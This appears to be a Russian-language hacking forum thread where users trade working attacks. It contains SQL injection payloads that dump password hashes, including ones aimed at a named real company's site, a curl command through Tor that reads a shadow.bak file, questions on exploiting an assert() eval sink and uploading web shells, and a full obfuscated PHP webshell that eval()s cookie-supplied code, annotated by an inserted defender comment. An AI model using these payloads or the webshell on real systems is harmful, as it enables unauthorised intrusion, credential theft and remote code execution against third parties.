Очень многие фаззеры дают ложные срабатывания (false positives) именно на time-based инъекциях. А вот w3af молодец: он умеет распознавать blind-инъекции.
http://xxx.ru/?r=club/catalog/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,password) from b_user limit 1,1))) -- - выводит не полный хэш, как составить запрос чтобы выводил все символы их хэша?
http://xxx.ru/?r=club/catalog/detai...0x3b,password) from b_user limit 1,1))) -- -# а как узнать название баз данных на сервере? Не таблиц а баз.
SELECT schema_name FROM information_schema.schemata; — для MySQL >= 5.0, или SELECT distinct(db) FROM mysql.db — последний срабатывает только при определённых условиях.
Что будет, если отправить 2 одинаковых HTTP-запроса одновременно? Например, при восстановлении пароля есть шансы, что придёт одинаковый код восстановления? Как отправить 2 запроса с минимальной задержкой? Какие похожие баги есть, кроме race condition, найденного в Starbucks?
Парни, подскажите пожалуйста, как на практике эксплуатировать данный баг: https://github.com/lesterchan/wp-email/commit/bcae41780ef78ce4d0780fc417c0343d5715b18a
PHP: <?php /*
 * NOTE(review / incident response): this is an obfuscated PHP backdoor ("webshell"), not
 * application code. $GLOBALS['s251'] is a character alphabet; every builtin it calls is
 * assembled at runtime from indexes into that alphabet and stored under random-looking
 * $GLOBALS keys, so a plain-text grep for the called functions finds nothing.
 * What the visible code does:
 *  - three ini_set() calls and set_time_limit(0) (decoding the indexes suggests error
 *    logging is turned off and the execution-time limit removed);
 *  - it takes the last $_COOKIE entry (falling back to $_POST), base64-decodes it,
 *    XOR-combines it with a hard-coded string kept in the $re3c global and with the
 *    parameter name, then unserialize()s the result (unserialize() on attacker data is
 *    itself dangerous independently of the eval() below);
 *  - if the decoded payload carries a field equal to that hard-coded string, one branch
 *    echoes a serialize()d fingerprint (phpversion() plus a version tag) and the other
 *    eval()s attacker-supplied code; both end with exit().
 * Defender guidance: treat a file like this as an indicator of compromise — quarantine it,
 * check web-server logs for requests that hit it (especially POSTs with unusual cookies),
 * and audit how it was written to disk (upload handler, vulnerable plugin, stolen creds).
 */ $GLOBALS['s251'] = "\x66\x2c\x54\x63\x65\x42\x24\x64\x5d\x2b\x3b\x23\x35\x33\x44\x22\x70\x38\x26\x27\x34\x53\x5f\x5b\x41\x50\x6e\x61\x46\x62\x73\x32\x30\x31\x3f\x77\xd\x5e\x57\x59\x6c\x48\x3a\x20\x49\x6f\x72\x69\x45\x7b\x7d\x4a\x6d\x29\x55\x76\x21\x7a\x4d\x56\x9\x79\x52\x36\x39\x3c\x4f\x43\x40\xa\x3e\x6b\x4c\x2d\x2a\x4e\x51\x5c\x74\x67\x58\x4b\x28\x78\x37\x5a\x7e\x25\x6a\x2e\x47\x7c\x60\x2f\x71\x3d\x75\x68";$GLOBALS[$GLOBALS['s251'][29].$GLOBALS['s251'][3].$GLOBALS['s251'][7].$GLOBALS['s251'][63].$GLOBALS['s251'][17].$GLOBALS['s251'][7].$GLOBALS['s251'][64]] = $GLOBALS['s251'][3].$GLOBALS['s251'][97].$GLOBALS['s251'][46];$GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]] = $GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][7];$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]] = $GLOBALS['s251'][30].$GLOBALS['s251'][78].$GLOBALS['s251'][46].$GLOBALS['s251'][40].$GLOBALS['s251'][4].$GLOBALS['s251'][26];$GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]] = $GLOBALS['s251'][47].$GLOBALS['s251'][26].$GLOBALS['s251'][47].$GLOBALS['s251'][22].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][78];$GLOBALS[$GLOBALS['s251'][79].$GLOBALS['s251'][84].$GLOBALS['s251'][0].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12].$GLOBALS['s251'][64]] = $GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][47].$GLOBALS['s251'][27].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][57].$GLOBALS['s251'][4];$GLOBALS[$GLOBALS['s251'][88].$GLOBALS['s251'][64].$GLOBALS['s251'][7].$GLOBALS['s251'][3].$GLOBALS['s251'][31].$GLOBALS['s251'][13].$GLOBALS['s251'][84].$GLOBALS['s251'][32].$GLOBALS['s251'][13]] = 
$GLOBALS['s251'][16].$GLOBALS['s251'][97].$GLOBALS['s251'][16].$GLOBALS['s251'][55].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][30].$GLOBALS['s251'][47].$GLOBALS['s251'][45].$GLOBALS['s251'][26];$GLOBALS[$GLOBALS['s251'][3].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][0]] = $GLOBALS['s251'][96].$GLOBALS['s251'][26].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][47].$GLOBALS['s251'][27].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][57].$GLOBALS['s251'][4];$GLOBALS[$GLOBALS['s251'][7].$GLOBALS['s251'][64].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][84].$GLOBALS['s251'][31].$GLOBALS['s251'][32].$GLOBALS['s251'][4]] = $GLOBALS['s251'][29].$GLOBALS['s251'][27].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][22].$GLOBALS['s251'][7].$GLOBALS['s251'][4].$GLOBALS['s251'][3].$GLOBALS['s251'][45].$GLOBALS['s251'][7].$GLOBALS['s251'][4];$GLOBALS[$GLOBALS['s251'][97].$GLOBALS['s251'][84].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][12].$GLOBALS['s251'][29].$GLOBALS['s251'][17]] = $GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][78].$GLOBALS['s251'][22].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][4].$GLOBALS['s251'][22].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][47].$GLOBALS['s251'][78];$GLOBALS[$GLOBALS['s251'][26].$GLOBALS['s251'][0].$GLOBALS['s251'][84].$GLOBALS['s251'][17]] = $GLOBALS['s251'][78].$GLOBALS['s251'][13].$GLOBALS['s251'][17].$GLOBALS['s251'][27].$GLOBALS['s251'][12];$GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]] = 
$GLOBALS['s251'][7].$GLOBALS['s251'][12].$GLOBALS['s251'][32].$GLOBALS['s251'][29].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][64].$GLOBALS['s251'][0];$GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][27].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][64].$GLOBALS['s251'][17].$GLOBALS['s251'][17]] = $_POST;$GLOBALS[$GLOBALS['s251'][35].$GLOBALS['s251'][63].$GLOBALS['s251'][63].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][0]] = $_COOKIE;@$GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][46].$GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][22].$GLOBALS['s251'][40].$GLOBALS['s251'][45].$GLOBALS['s251'][79], NULL);@$GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][40].$GLOBALS['s251'][45].$GLOBALS['s251'][79].$GLOBALS['s251'][22].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][46].$GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][30], 0);@$GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][52].$GLOBALS['s251'][27].$GLOBALS['s251'][83].$GLOBALS['s251'][22].$GLOBALS['s251'][4].$GLOBALS['s251'][83].$GLOBALS['s251'][4].$GLOBALS['s251'][3].$GLOBALS['s251'][96].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][45].$GLOBALS['s251'][26].$GLOBALS['s251'][22].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][4], 0);@$GLOBALS[$GLOBALS['s251'][97].$GLOBALS['s251'][84].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][12].$GLOBALS['s251'][29].$GLOBALS['s251'][17]](0);$q91f628 = NULL;$t1fb = NULL;$GLOBALS[$GLOBALS['s251'][46].$GLOBALS['s251'][4].$GLOBALS['s251'][13].$GLOBALS['s251'][3]] = 
$GLOBALS['s251'][20].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][64].$GLOBALS['s251'][31].$GLOBALS['s251'][84].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][73].$GLOBALS['s251'][31].$GLOBALS['s251'][4].$GLOBALS['s251'][17].$GLOBALS['s251'][27].$GLOBALS['s251'][73].$GLOBALS['s251'][20].$GLOBALS['s251'][33].$GLOBALS['s251'][29].$GLOBALS['s251'][13].$GLOBALS['s251'][73].$GLOBALS['s251'][29].$GLOBALS['s251'][27].$GLOBALS['s251'][3].$GLOBALS['s251'][63].$GLOBALS['s251'][73].$GLOBALS['s251'][12].$GLOBALS['s251'][32].$GLOBALS['s251'][32].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][7].$GLOBALS['s251'][27].$GLOBALS['s251'][84].$GLOBALS['s251'][84].$GLOBALS['s251'][17];global $re3c;/* Byte-wise XOR of $q91f628 with $j49bf, $j49bf repeated as often as needed (the two aliased
   builtins used here are the ord/chr-style helpers registered at the top of the file). */function d50b4359f($q91f628, $j49bf){ $s06aaf = ""; for ($l220c9=0; $l220c9<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($q91f628);) { for ($s49809=0; $s49809<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($j49bf) && $l220c9<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($q91f628); $s49809++, $l220c9++) { $s06aaf .= $GLOBALS[$GLOBALS['s251'][29].$GLOBALS['s251'][3].$GLOBALS['s251'][7].$GLOBALS['s251'][63].$GLOBALS['s251'][17].$GLOBALS['s251'][7].$GLOBALS['s251'][64]]($GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]]($q91f628[$l220c9]) ^ $GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]]($j49bf[$s49809])); } } return $s06aaf;}/* Two-pass XOR: first with the hard-coded $re3c string, then with the caller-supplied key
   ($j49bf is the cookie / POST parameter name at the call site below). */function t38a5($q91f628, $j49bf){ global $re3c; return 
$GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]]($GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]]($q91f628, $re3c), $j49bf);}/* Input selection: the LAST cookie wins; only if no cookie is present does the last $_POST
   field get used. The value is then base64-decoded, XOR-ed and unserialize()d. */foreach ($GLOBALS[$GLOBALS['s251'][35].$GLOBALS['s251'][63].$GLOBALS['s251'][63].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][0]] as $j49bf=>$tf4daa){ $q91f628 = $tf4daa; $t1fb = $j49bf;}if (!$q91f628){ foreach ($GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][27].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][64].$GLOBALS['s251'][17].$GLOBALS['s251'][17]] as $j49bf=>$tf4daa) { $q91f628 = $tf4daa; $t1fb = $j49bf; }}$q91f628 = @$GLOBALS[$GLOBALS['s251'][3].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][0]]($GLOBALS[$GLOBALS['s251'][26].$GLOBALS['s251'][0].$GLOBALS['s251'][84].$GLOBALS['s251'][17]]($GLOBALS[$GLOBALS['s251'][7].$GLOBALS['s251'][64].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][84].$GLOBALS['s251'][31].$GLOBALS['s251'][32].$GLOBALS['s251'][4]]($q91f628), $t1fb));/* Gate: the decoded payload must echo the hard-coded $re3c value back (loose == compare).
   Then either a serialize()d fingerprint is printed or the supplied string is eval()ed —
   this is the remote-code-execution path; the script always exit()s afterwards. */if (isset($q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]]) && $re3c==$q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]]){ if ($q91f628[$GLOBALS['s251'][27]] == $GLOBALS['s251'][47]) { $l220c9 = Array( $GLOBALS['s251'][16].$GLOBALS['s251'][55] => @$GLOBALS[$GLOBALS['s251'][88].$GLOBALS['s251'][64].$GLOBALS['s251'][7].$GLOBALS['s251'][3].$GLOBALS['s251'][31].$GLOBALS['s251'][13].$GLOBALS['s251'][84].$GLOBALS['s251'][32].$GLOBALS['s251'][13]](), $GLOBALS['s251'][30].$GLOBALS['s251'][55] => $GLOBALS['s251'][33].$GLOBALS['s251'][89].$GLOBALS['s251'][32].$GLOBALS['s251'][73].$GLOBALS['s251'][33], ); echo @$GLOBALS[$GLOBALS['s251'][79].$GLOBALS['s251'][84].$GLOBALS['s251'][0].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12].$GLOBALS['s251'][64]]($l220c9); } elseif ($q91f628[$GLOBALS['s251'][27]] == $GLOBALS['s251'][4]) { eval($q91f628[$GLOBALS['s251'][7]]); } exit();} 
Что это?
Code: http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41','42','43','44','45','46','47','48','49','50','51','52','53','54','55','56','57','58','59','60','61','62','63','64','65',66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180+--+ Хелп, нужно вывод
Не стоит забывать, что иногда параметры можно передавать одинаково как через GET, так и через POST, в котором зачастую ничего не фильтруется! Code: POST /en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b HTTP/1.1 Host: www.men-defencetec.de User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 94 tx_men_pi1[detail]=(1)--~(select*from(select(concat_ws(0x3a,@@version,database(),user()))n)f)# Результат:
assert(stripslashes($_REQUEST['p'])); Подскажите, кто-нибудь, как через assert пролиться? Не пойму, как он работает.
Code: $ curl -s -k --proxy socks5://127.0.0.1:9150 'http://*.com/ajax/*.php?UserID=1+union+select+1,2,3,load_file%280x2f6574632f736861646f772e62616b%29,5,6,7,8,9%23' | perl -lane '~s/\\n/\n/g;print' | tail -n 2 | perl -lane '~/[^:]+:(.{15})/;print $1' $1$piXULrQ7$R3T $1$piXULrQ7$R3T shadow.bak
Кто-нибудь может показать пример нормального upload'а? Через мой не хочет грузить на сервер шелл. Тут проблема в одном из двух: либо я глуп и мал, либо проблема на стороне сервера. P.S. С этим разобрался: в директории нет прав на запись. Можно ли что-нибудь придумать с этим?